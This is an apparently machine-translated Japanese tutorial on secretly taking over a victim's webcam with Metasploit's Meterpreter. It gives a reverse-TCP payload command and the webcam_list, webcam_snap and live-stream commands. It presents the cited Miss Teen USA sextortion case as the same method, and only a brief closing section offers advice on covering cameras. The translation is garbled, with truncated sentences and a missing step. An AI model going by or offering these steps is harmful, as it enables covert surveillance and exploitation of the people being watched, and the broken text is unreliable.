このチュートリアルでは、インターネットを介して密かにリモートでwebカメラにハッキングし、反対側で何が起こっているのかを覗いてみましょう。 強力なMeterpreterとKali Linuxを使って被害者のウェブカメラに侵入します。 私たちは、ウェブカメラの完全な制御を取るそれをオンにし、スナップショットを取得し、さらには誰もが今まで見つけること
2014年初頭、ハッカーはミス-ティーンUSA2013にこれだけをやったために18ヶ月を宣告されました。 彼は(いくつかの古いソフトウェアのような)彼女のコンピュータの脆弱性を発見し、ウェブカメラからいくつかの妥協の写真を取り、より多くの写真を送 彼が使った方法はまさに私たちがここで試してみるものです。p>
私たちの親友meterpreterこのハックで私たちを助けるために起こっています。 Meterpreterを使用すると、誰かのウェブカメラを制御したり、キーロガーをインストールしたり、独自のウイルスを植えたり、プライベートデータを盗んだり、被害者のコンこのチュートリアルでは、Metasploitを使用して脆弱性を悪用するために攻撃モジュールを既に使用していると仮定しています(これを行う方法は?). それでは、それを取得してみましょう。
どのようにウェブカメラをハックするには?ステップ1:meterpreterをセットアップします。
被害者の悪用に成功した後、選択したペイロードを設定するオプションがあります。 ペイロードは、被害者のコンピュータが壊れたら、metasploitに何をすべきかを伝えます。 Meterpreterは私達のペイロードである。 次のコマンドは、ペイロードを設定します:
set payload windows/meterpreter/reverse_tcp攻撃が成功した場合、metasploitは自動的にターゲットシステムにmeterpreterをインストールし、ウェブカメラのハッキングに進むことができます。
ステップ2:ウェブカメラを見つけます。
Meterpreterには、リモートシステムのウェブカメラを検索して制御するための組み込みモジュールがあります。 我々は、システムがあってもウェブカメラを持っているかどうかを検索することによnot.me。以下のコマンドがそのために使用され、それはまた、私たちにウェブカメラの名前を返します。p>
meterpreter > webcam_listそして今、あなたはあなたのターゲットのウェブカメラが表示されるはずです(複数可)出力にリストされています。P>
meterpreter > webcam_snapそして今、あなたは写真がフォルダに保存されている表示されるはずです/opt/framework3/msf3単にそこに向かう
ステップ4:ハッキングされたウェブカメラ
だから、私たちはちょうど写真を撮った、のは、ライブビデオストリームを取得する方法を見てみましょう。 これを行うには、以下のコマンドを入力します: (–pパラメータを使用して、ビデオストリーミングファイルに与えたいディレクトリを指定しています)
meterpreter > run webcam -p /var/wwwこのコ このファイルを開いて、ライブビデオストリームのもう一方の端で何が起こっているのかをチェックすることができます。あなた自身のウェブカメラがハッキングされるのを防ぐ方法は?
あなた自身のウェブカメラがハッキングされるのを防ぐ方法は?webカメラに侵入するにはいくつかの方法があります。
上記の例では、わずか数の小さなコマンドで、私たちは私たちの被害者のウェブカメラに覗くことができます。 経験豊富なセキュリティ専門家は、システムが完全に安全ではないことを教えてくれます。 これが、使用していないときは常にカメラをカバーしておく必要がある理由です。 個人的には、私は私のラップトップとスマートフォンの両方でこの小さなガジェットを使用しています。p>
あなたは今どのデバイスを使用していますか? スマートフォン? ノートパソコン? チャンスはカメラを直接凝視しているである。 あなたは突然少し不安を感じていますか? そうすべきだ チャンスを取らないでください。 あなたは、単にあなたのカメラをカバーし、日常的にすべてのソフトウェアを更新する場合は、ウェブカメラハック自分の犠牲者であることを避